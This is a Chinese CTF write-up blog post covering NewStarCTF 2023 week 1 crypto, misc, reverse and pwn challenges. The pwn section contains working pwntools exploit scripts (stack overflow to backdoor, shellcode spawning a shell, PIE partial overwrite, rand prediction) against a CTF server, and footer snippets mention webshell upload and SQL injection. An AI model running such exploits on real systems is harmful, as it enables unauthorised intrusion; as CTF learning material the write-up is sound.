[NewStarCTF 2023 公开赛道] week1

这篇具有很好参考价值的文章主要介绍了[NewStarCTF 2023 公开赛道] week1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

最近没什么正式比赛,都是入门赛,有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。

这周newstar第1周结束了,据说py得很厉害,第2周延期了,什么时候开始还不一定,不过第一周已经结束提交了,可以发上来存下。总体来说没难题。

 Crypto

brainfuck

++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.

直接到网站解密 Brainfuck/OoK加密解密 - Bugku CTF

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar's Secert

kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed} 

随波逐流工具一键解密

 key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy}

Fence

 fa{ereigtepanet6680}lgrodrn_h_litx#8fc3

同样随波,W栅栏

flag{reordering_the_plaintext#686f8c03} 

Vigenère

 pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}

试密钥,逐个字母试,使头为flag,也可以从 vigenere的表上查

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0} 

babyencoding

 flag由3段组成,第1段是base64,第2段是base32,第3段是uuencode

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T` 

不过这个uuencode需要在 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍--查错网 

上解码,随波上后部是乱码

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

babyrsa

n是由一堆小素数组成,可以直接分解

from Crypto.Util.number import *
from flag import flag

def gen_prime(n):
    res = 1

    for i in range(15):
        res *= getPrime(n)

    return res


if __name__ == '__main__':
    n = gen_prime(32)
    e = 65537
    m = bytes_to_long(flag)
    c = pow(m,e,n)
    print(n)
    print(c)
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

在sage上直接得到phi

phi = euler_phi(n)
d = inverse_mod(0x10001, phi)
m = pow(c,d,n)
l2b(int(m))
b'flag{us4_s1ge_t0_cal_phI}'

Small d

d很小,直接用winer

from secret import flag
from Crypto.Util.number import *

p = getPrime(1024)
q = getPrime(1024)

d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)

c = pow(m,e,n)

print(c)
print(e)
print(n)

c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
#sage
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):
    res = []
    while y:
        res.append(x//y)
        x,y = y,x%y
    return res

def continued_fraction(res):
    numerator,denominator = 1,0
    for i in res[::-1]:
        denominator,numerator = numerator,i*numerator+denominator
    return numerator,denominator

def wiener_attack(c,res,n):
    print("Attack start...")
    for i in range(1,len(res)):
        ress = res[:i]
        d = continued_fraction(ress)[1]
        m = long_to_bytes(int(pow(c,d,n)))
        #if all(0x20<=k<=0x7f for k in m):
        if b'flag{' in m:
            print(m)
            break
        
res = transform(e,n)
wiener_attack(c,res,n)

#Attack start...
#b'flag{learn_some_continued_fraction_technique#dc16885c}'

babyxor

1字节异或加密,直接爆破

from secret import *

ciphertext = []

for f in flag:
    ciphertext.append(f ^ key)

print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2
enc = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):
    tmp = bytes([i^v for v in enc])
    if b'flag' in tmp:
        print(tmp)

#flag{x0r_15_symm3try_and_e4zy!!!!!!}

Affine

仿射密码

from flag import flag, key

modulus = 256

ciphertext = []

for f in flag:
    ciphertext.append((key[0]*f + key[1]) % modulus)

print(bytes(ciphertext).hex())

# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064

因为两个key都很小,可以直接用flag{头爆破出来

enc = bytes.fromhex('dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
for i in range(256):
  for j in range(256):
    if bytes([(i*v+j)%256 for v in b'flag{']) == enc[:5]:
      print(i,j)

a,b = 17,23 
flag = ''
for i in range(len(enc)):
    for k in range(0x21,0x7f):
        if (a*k + b)%256 == enc[i]:
            flag += chr(k)
            break 

print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *

def pad(data):
    return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])

def main():
    flag_ = pad(flag)
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)

if __name__ == "__main__":
    main()

key有16*2字节,iv只有16字节,前部爆露,可以得到key和iv然后直接解密

hint = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
key = long_to_bytes(hint^1)[:16]*2
iv = long_to_bytes(hint^1^bytes_to_long(key))

aes = AES.new(key, AES.MODE_CBC, iv)
aes.decrypt(enc)
#b'firsT_cry_Aes\x00\x00\x00'
#flag{firsT_cry_Aes}

MISC

CyberChef's Secret

怀疑这是crypto过来的

M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

直接叫厨子

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript 

机密图片

 一个图片是个二维码,显然不是flag,用StegSolver

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

流量!鲨鱼! 

流量题,用wireshark打开,可以看到好多 http访问,接协议排序找到可疑项

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

追踪http流得到密文

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

上厨子,点魔术棒两次

压缩包们 

附件用010打开,发现是zip文件少头,改头为504b0304,后部有base64的提示

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript 解出提示是

I like six-digit numbers because they are very concise and easy to remember.

就是说6位数字密码,爆破6位数字,爆破报错,说明压缩包密码方式有误,用010修改下把0改为0

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

然后爆破密码,得到flag

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript 

空白格 

压缩包打开是个由空格和tab组成的空白文件,把空格换成0,tab换成1,每行只取后8字符(这里中间还都插着个1不知怎么出来的)

a = open('white.txt').readlines()
flag = ''
for v in a:
    v = v[:-1].replace(' ', '0').replace('\t', '1')
    flag += chr(int(v[-8:],2))

print(flag.replace(chr(1),''))

隐秘的眼睛

显然是提到眼睛就是silenteye

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

PWN

ret2text 

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

read有溢出,直接写后门

from pwn import *

p = remote('node4.buuoj.cn',29584)
context.log_level = 'debug'

p.sendlineafter(b"Show me your magic", b'\x00'*0x28 + p64(0x4011fb))
print(p.sendline(b'cat flag'))
p.interactive()

 ezshellcode

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

建了个可写可执行的块把shellcode读进去然后执行

from pwn import *

p = remote('node4.buuoj.cn',29612)
context(arch='amd64', log_level = 'debug')

p.sendlineafter(b"Show me your magic", asm(shellcraft.sh()))
print(p.sendline(b'cat flag'))
p.interactive()

 newstar shop

这题主要是看代码,

一共有100块,买gift花40两次,再运行3 减50变成负数,再买flag即可

输入:1,2,1,2,3,1,3

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init();
  while ( 1 )
  {
    menu();
    if ( (int)__isoc99_scanf("%d", &v3) <= 0 )
      puts("Invalid input");
    switch ( v3 )
    {
      case 1:
        shop();
        break;
      case 2:
        makemoney();
        break;
      case 3:
        dont_try();
        break;
      default:
        puts("nothing here");
        puts("\n");
        break;
    }
  }
}
unsigned __int64 shop()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("=============================");
  puts("===Welcome to newstar shop===");
  puts("=============================");
  puts("1.newstar's gift          20$");
  puts("2.pwn write up            40$");
  puts("3.shell                 9999$");
  puts("\n");
  puts("All things are only available for one day!");
  puts("What do you want to buy?");
  puts("\n");
  if ( (int)__isoc99_scanf("%d", &v1) <= 0 )
    puts("Invalid input");
  if ( v1 != 3 )
  {
    if ( v1 > 3 )
    {
LABEL_17:
      puts("nothing here");
      puts("\n");
      return v2 - __readfsqword(0x28u);
    }
    if ( v1 == 1 )
    {
      if ( (unsigned int)money > 0x13 )
      {
        money -= 20;
        puts("You buy a newstar's gift");
        puts("That is the gift:");
        puts("What will happen when int transfer to unsigned int?");
        goto LABEL_10;
      }
    }
    else
    {
      if ( v1 != 2 )
        goto LABEL_17;
      if ( (unsigned int)money > 0x27 )
      {
        money -= 40;
        puts("You buy a pwn write up");
        puts("That is free after the match,haha");
        goto LABEL_10;
      }
    }
    puts("Sorry,you don't have enough money");
LABEL_10:
    puts("\n");
    return v2 - __readfsqword(0x28u);
  }
  if ( (unsigned int)money > 0x270E )
  {
    money = 0;
    puts("How do you buy it?");
    puts("\n");
    system("/bin/sh");
  }
  else
  {
    puts("Sorry,you don't have enough money");
    puts("\n");
  }
  return v2 - __readfsqword(0x28u);
}

p1eee

跟前边第1题类似,read有溢出还有后门,不过后门没直接给出

ssize_t sub_120E()
{
  __int64 buf[4]; // [rsp+0h] [rbp-20h] BYREF

  memset(buf, 0, sizeof(buf));
  puts("A nice try to break pie!!!");
  return read(0, buf, 0x29uLL);
}

后门

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

from pwn import *

p = remote('node4.buuoj.cn',25970)
context(arch='amd64', log_level = 'debug')

p.sendafter(b"A nice try to break pie!!!", b'\x00'*0x28 + p8(0x6c))
print(p.sendline(b'cat flag'))
p.interactive()

 Random

猜对一个数即可

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v3; // bl
  int v4; // eax
  int v6; // [rsp+4h] [rbp-2Ch] BYREF
  unsigned int seed; // [rsp+8h] [rbp-28h]
  int v8; // [rsp+Ch] [rbp-24h]
  _BYTE v9[5]; // [rsp+13h] [rbp-1Dh] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-18h]

  v10 = __readfsqword(0x28u);
  init(argc, argv, envp);
  seed = time(0LL);
  srand(seed);
  v8 = rand();
  puts("can you guess the number?");
  __isoc99_scanf("%d", &v6);
  if ( v8 == v6 )
  {
    qmemcpy(v9, "2$031", sizeof(v9));
    v3 = v9[rand() % 5];
    v4 = rand();
    sy(v9[v4 % 2], v3);
  }
  else
  {
    printf("%s", "Haha you are wrong");
  }
  return 0;
}

用ctypes库猜一个数

from ctypes import *
from pwn import *

clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")

p = remote('node4.buuoj.cn',26584)
context(arch='amd64', log_level = 'debug')


clibc.srand(clibc.time(0))
v =clibc.rand()

p.sendlineafter(b"can you guess the number?", str(v).encode())

p.sendline(b'/bin/sh')
p.sendline(b'cat flag')

p.interactive()

REVERSE

easy_RE

IDA一打开就看到一半

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

再反编译又是一半

 咳

加密方法就是加1

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

>>> a = b'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
>>> bytes([v-1 for v in a])
b'flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}'

 Segments

根据题目名字查看段

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

ELF

 第二步是base64

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edx
  char *s1; // [rsp+0h] [rbp-20h]
  char *v6; // [rsp+8h] [rbp-18h]
  char *s; // [rsp+10h] [rbp-10h]

  s = (char *)malloc(0x64uLL);
  printf("Input flag: ");
  fgets(s, 100, stdin);
  s[strcspn(s, "\n")] = 0;
  v6 = encode(s);
  v3 = strlen(v6);
  s1 = base64_encode((__int64)v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
    puts("Correct");
  else
    puts("Wrong");
  free(v6);
  free(s1);
  free(s);
  return 0;
}

第1步encode是与0x20异或

_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}
a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
b = b64decode(a)
bytes([(v-16)^0x20 for v in b])
b'flag{D0_4ou_7now_wha7_ELF_1s?}'

Endian

这是大端小端的意思

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char v6[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  puts("please input your flag");
  __isoc99_scanf("%s", v6);
  v5 = v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
}

加密只是作了个异或

>>> enc = [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]
>>> a = [0x12345678 ^ v for v in enc]
>>>
>>> a
[1734437990, 1768713339, 1600943220, 1768189509, 1633644129]
>>> long_to_bytes(a[0])
b'galf'
>>> from pwn import p32
>>> b''.join(p32(v) for v in a)
b'flag{llittl_Endian_a'
>>>

AndroXor

用jadx打开,可以看到密文,key(异或)

public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;

    static {
        System.loadLibrary("androxor");
    }

    public String Xor(String str, String str2) {
        char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
        char[] cArr2 = new char[str.length()];
        String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
        for (int i = 0; i < str.length(); i++) {
            char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
            cArr2[i] = charAt;
            if (cArr[i] != charAt) {
                return "wrong!!!";
            }
        }
        return str3;
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        final EditText editText = (EditText) findViewById(R.id.password);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                String obj = editText.getText().toString();
                MainActivity mainActivity = MainActivity.this;
                Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
                Log.d("输入", editText.getText().toString());
            }
        });
    }
}
c = [14,ord('\r'), 17, 23, 2, ord('K'), ord('I'), ord('7'), ord(' '), 30, 20, ord('I'), ord('\n'), 2, ord('\f'), ord('>'), ord('('), ord('@'), 11, ord('\''), ord('K'), ord('Y'), 25, ord('A'), ord('\r')]
key = b'happyx3'

xor(bytes(c),key)
#flag{3z_And0r1d_X0r_x1x1}

EzPE

又是下异或,这是第1个字符是序号和第2个异或

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

enc = bytes.fromhex('0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D')
flag = 'f'
for i in range(len(enc)):
    for k in range(0x20,0x7f):
        if ord(flag[i])^k^i == enc[i]:
            flag += chr(k)
            break 
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

 lazy_activtiy

又是个APK文件,从程序里看点击够10000就出flag

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript

这里的editText就是flag

打开layout,找到用户定义的资源

[NewStarCTF 2023 公开赛道] week1,算法,前端,javascript 文章来源地址https://www.toymoban.com/news/detail-727717.html

到了这里,关于[NewStarCTF 2023 公开赛道] week1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [wp]NewStarCTF 2023 WEEK1|WEB

    考的就是敏感信息的泄露 题目提示两个  无非就最简单的三种 1.robots.txt 2.www.zip 3.index.php.swp 当然我的做法就是直接用dirsearch扫描了 得到了robots.txt和www.zip文件,访问拼接就得到了flag了   考的就是绕过客户端 JavaScript检验 上传一句话木马修改文件名后缀就行了 一句话木马内

    2024年02月07日
    浏览(37)
  • [wp]NewStarCTF 2023 WEEK3|WEB

    medium_sql Sqlmap一把梭 (部分能直接 flag\\\' 部分出现flag不完整 或者部分爆不到表 等官方wp) 在week1的基础上,多过滤了union。 验证存在布尔盲注: ?id=TMP0919\\\' And if(10,1,0)# ?id=TMP0919\\\' And if(01,1,0)# 发第一个,有回显,第二个,没回显,说明页面可以根据if判断的结果回显两种(真假)

    2024年02月08日
    浏览(33)
  • 【2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~

    泄露的秘密 www.zip Begin of Upload 打开源码 找到限制是在前端 我们抓包 上传正常后缀的文件 比如jpg结尾 但是这样传上去服务器是无法解析的 所以我们进行抓包 然后在bp中修改后缀名 将我们上传的后缀jpg在请求包中改为php 服务器就可以解析我们的语句了 一句话木马: ?php eval

    2024年02月06日
    浏览(49)
  • NewStarCTF2023week4-midsql(利用二分查找实现时间盲注攻击)

    大致测试一下,发现空格被过滤了 使用内联注释/**/绕过,可行 使用%a0替代空格,也可以  再次测试发现等号也被过滤,我们使用 like 代替 (我最开始以为是and被过滤,并没有,如果是and或者or被过滤我们也可以使用 和 || 替代) 但是这里尝试了很多都只返回一个页面,没有

    2024年02月07日
    浏览(46)
  • FSCTF 2023(公开赛道)CRYPTO WP

    1、题目信息 2、解题方法 exp 1、题目信息 2、解题方法 阴阳怪气密码解码 1、题目信息 2、解题方法 1、题目信息 2、解题方法 dp泄露 exp 1、题目信息 2、解题方法 exp1:维纳攻击1 exp2: 维纳攻击2 1、题目信息 2、题目信息 共e攻击 1、题目信息 2、解题方法 cyber一把梭 1、题目信

    2024年02月08日
    浏览(47)
  • FSCTF 2023(公开赛道) MISC(复盘) WP

    2024年02月08日
    浏览(289)
  • week1-深度学习概论

    神经网络又称人工神经网络 (ANN) 或模拟神经网络 (SNN),是机器学习的子集,同时也是深度学习算法的核心。  神经网络其名称和结构均受到人脑的启发,可模仿生物神经元相互传递信号的方式。 人工神经网络 (ANN) 由节点层组成,包含一个输入层、一个或多个隐藏层和一个

    2024年02月05日
    浏览(58)
  • 蓝桥杯冲刺 - week1

    🚩第一周从最高频-分数占比 最高 开始练习!涉及算法标签[⚽️DFS,⚽️BFS,⚽️日期问题,⚽️哈希统计] DFS 乃是暴力搜索的基础, BFS 常用于解决迷宫问题,日期问题可以视为常规题 ⏳最后三个星期大家一起冲刺,祝大家rp++🏅 如果对您有帮助的话还请动动小手 点赞👍,收藏

    2023年04月08日
    浏览(67)
  • 机器学习 监督学习 Week1

    - NumPy, a popular library for scientific computing - Matplotlib, a popular library for plotting data plt.style.use() 是 Matplotlib 库中用于设置绘图样式的函数。 通过使用 plt.style.use() 函数,我们可以方便地应用各种预定义的风格或自定义的样式表。Matplotlib 提供了许多内置风格表,包括 \\\'default\\\' (默认

    2024年02月06日
    浏览(53)
  • Week1:用两个栈实现队列

    用两个栈实现一个队列。队列的声明如下,请实现它的两个函数 appendTail 和 deleteHead ,分别完成在队列尾部插入整数和在队列头部删除整数的功能。(若队列中没有元素,deleteHead 操作返回 -1 ) 示例 1: 示例 2: 示例的含义: 第一行可以理解为对队列的操作,共有三种 ①CQue

    2024年02月10日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包